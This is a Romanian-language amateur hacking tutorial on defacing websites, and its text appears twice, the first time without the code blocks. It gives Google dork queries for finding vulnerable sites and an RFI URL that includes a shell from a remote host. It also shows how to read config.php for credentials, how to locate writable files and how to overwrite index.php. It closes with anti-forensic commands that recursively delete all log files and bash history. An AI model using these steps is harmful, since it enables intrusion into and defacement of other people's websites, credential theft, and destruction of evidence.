mini manualt pt a sarge web-s
Noi numim deface atunci cand hackuim un web site.Asta in unele tari este ilegal si iti dau ani buni in inchisuare.Aceste deface se realizeaza prin erori numte BUGS
#Cum se face un deface:
•Cautand vulnerabilitati in google:
Daca Bug-ul se gaseste intro carpeta poti scrie asta in google si o sa iti apara duar acea carpeta in diverse web.
EXEMPLU
Daca cea ce vrei sa spargi se diferenteaza pt ca zice "powered by... " poti folosi urmatorul lucru:
•Cand il gasim:
Daca gasesti BUG-ul tau,depinde de ce metoda de deface esti daca este RFI (REMOTE FILE INCLUSION), RRE (REMOTE ROOT EXPLOIT) ,SQL inject,etc... trebuie sa ai un bun shell: si sa stii niste comenzi de baza de LINUX o WINDOWS momentan vom vb doar de comenzi linux (shell:unelta facuta in diverse limbaje eu gandesc ca este un executor de comenzi) functioneaza asa:
Pentru a putea sparge un site din index trebuie sa ai permisii de scriere daca iti apare asta in shell numai facand echo hacked by nick-u tau>index.php lai putea hackui.
shell:
Si daca nu avem permisie de scriere cautam arhiva numita config.php acolo se pastreaza users & pass ei datele adminuui te loghezi sau prin FTP
si o sati iasa toata configuratia WEB-ului pana si pass & user de su B.D absolut tot, sau daca vrei poti folosi comanda pentru a cauta arhive cu permisi de scriiere:
si bingo iti apar toate arhivele cu drepturi de scriiere, DEJA ESTI UN DEFACER mint asta este duar inceputul .
Cred ca ai inteles.Acuma urmeaza comenzile Linux,sunt foarte simple in aceste tipuri de hack,deface aici lasa o lista basica de comenzi Linux si Windows ca sa stii cum sa navighezi cu shell-ul tau
Comenzi
Linux Windows Explicatie
cat type Te uiti la continutul unei arhive
cd, chdir cd, chdir Schimba directorul in curs.
chmod attrib schimba modul unui fisier
ls dir Te uiti la continutul directorului
mkdir md, mkdir Creaza director
mv move Muti o arhiva sau director
rmdir rd, rmdir Elimini subdirector
rm -r deltree Elimini subdirector si tot continutul sau
echo echo Arata mesaje
• La sfarsit:
Sper ca ai inteles,totdeauna la terminarea unui DEFACE trebuie sa stergi logs, cel mai bine e sa stii u cei aia t ca eu un am timp sa va explic, sunt mai multe metode de a sterge acele logs dar cum esti un n00b ca sa un zic lammer o sa o facem de mod superficial:
Mai intai gasim posibilele arhive logs si dupa aia le stergem
dupa aceia stergem arhivele .bash_history si .bash_logout am inteles de la cineva ca acolo este salvat totul ce se executa pe server
shell: cd /;rm .bash_logout
cd /;rm .bash_history
Daca un gasiti aceste arhive rugativa la Dumnezeu sa un va gaseasca.
Noi numim deface atunci cand hackuim un web site.Asta in unele tari este ilegal si iti dau ani buni in inchisuare.Aceste deface se realizeaza prin erori numte BUGS
#Cum se face un deface:
•Cautand vulnerabilitati in google:
Daca Bug-ul se gaseste intro carpeta poti scrie asta in google si o sa iti apara duar acea carpeta in diverse web.
EXEMPLU
- Code:
google:
allinurl:/carpeta/bug
Daca cea ce vrei sa spargi se diferenteaza pt ca zice "powered by... " poti folosi urmatorul lucru:
- Code:
google:
"powered by..."
- Code:
google:
allintxt: powered by.
•Cand il gasim:
Daca gasesti BUG-ul tau,depinde de ce metoda de deface esti daca este RFI (REMOTE FILE INCLUSION), RRE (REMOTE ROOT EXPLOIT) ,SQL inject,etc... trebuie sa ai un bun shell: si sa stii niste comenzi de baza de LINUX o WINDOWS momentan vom vb doar de comenzi linux (shell:unelta facuta in diverse limbaje eu gandesc ca este un executor de comenzi) functioneaza asa:
- Code:
shell:
http://victima.com/path/bug.php?tipdeincludere=http://shell:.com/shell:.txt?&cmd=comanda linux pt folosire
Pentru a putea sparge un site din index trebuie sa ai permisii de scriere daca iti apare asta in shell numai facand echo hacked by nick-u tau>index.php lai putea hackui.
shell:
- Code:
Permissão de Escrita: SIM
Si daca nu avem permisie de scriere cautam arhiva numita config.php acolo se pastreaza users & pass ei datele adminuui te loghezi sau prin FTP
- Code:
shell:
cat config.php
si o sati iasa toata configuratia WEB-ului pana si pass & user de su B.D absolut tot, sau daca vrei poti folosi comanda pentru a cauta arhive cu permisi de scriiere:
- Code:
shell:
cd /usr/www/htdocs/ondetuestesehhh/;find -perm 777
si bingo iti apar toate arhivele cu drepturi de scriiere, DEJA ESTI UN DEFACER mint asta este duar inceputul .
Cred ca ai inteles.Acuma urmeaza comenzile Linux,sunt foarte simple in aceste tipuri de hack,deface aici lasa o lista basica de comenzi Linux si Windows ca sa stii cum sa navighezi cu shell-ul tau
Comenzi
Linux Windows Explicatie
cat type Te uiti la continutul unei arhive
cd, chdir cd, chdir Schimba directorul in curs.
chmod attrib schimba modul unui fisier
ls dir Te uiti la continutul directorului
mkdir md, mkdir Creaza director
mv move Muti o arhiva sau director
rmdir rd, rmdir Elimini subdirector
rm -r deltree Elimini subdirector si tot continutul sau
echo echo Arata mesaje
• La sfarsit:
Sper ca ai inteles,totdeauna la terminarea unui DEFACE trebuie sa stergi logs, cel mai bine e sa stii u cei aia t ca eu un am timp sa va explic, sunt mai multe metode de a sterge acele logs dar cum esti un n00b ca sa un zic lammer o sa o facem de mod superficial:
Mai intai gasim posibilele arhive logs si dupa aia le stergem
- Code:
shell:
find / -name "*.log" -exec rm -rf {} \;
dupa aceia stergem arhivele .bash_history si .bash_logout am inteles de la cineva ca acolo este salvat totul ce se executa pe server
shell: cd /;rm .bash_logout
cd /;rm .bash_history
Daca un gasiti aceste arhive rugativa la Dumnezeu sa un va gaseasca.